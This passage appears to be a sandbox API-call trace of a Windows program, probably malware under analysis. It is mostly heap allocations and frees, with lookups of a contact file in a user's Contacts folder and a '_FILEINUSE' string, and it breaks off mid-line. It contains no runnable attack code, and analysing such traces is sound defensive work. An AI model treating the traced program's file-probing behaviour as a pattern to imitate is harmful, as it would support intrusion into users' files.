[0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0074.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0074.690] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.690] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0074.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0074.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0074.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0074.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0074.691] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0074.691] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.691] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0074.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x110) returned 0x6b9e98 [0074.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0074.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0074.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.692] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.692] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.692] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0074.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.693] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.693] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.693] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x657690, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 0x6b89b8 [0074.694] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0074.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0074.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0074.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0074.694] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0074.694] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0074.695] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0074.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0074.695] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x0, dwReserved1=0x657690, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 0x6b89b8 [0074.695] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0074.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0074.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0074.695] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0074.695] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.696] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0074.696] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.696] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89b8 [0074.697] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0074.697] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0074.697] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0074.698] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0074.698] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.698] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0074.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0074.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0074.698] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0074.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0074.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690900 [0074.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0074.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0074.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad60 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0074.699] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0074.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0074.700] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0074.700] HeapFree (in: hHeap=0x650000, 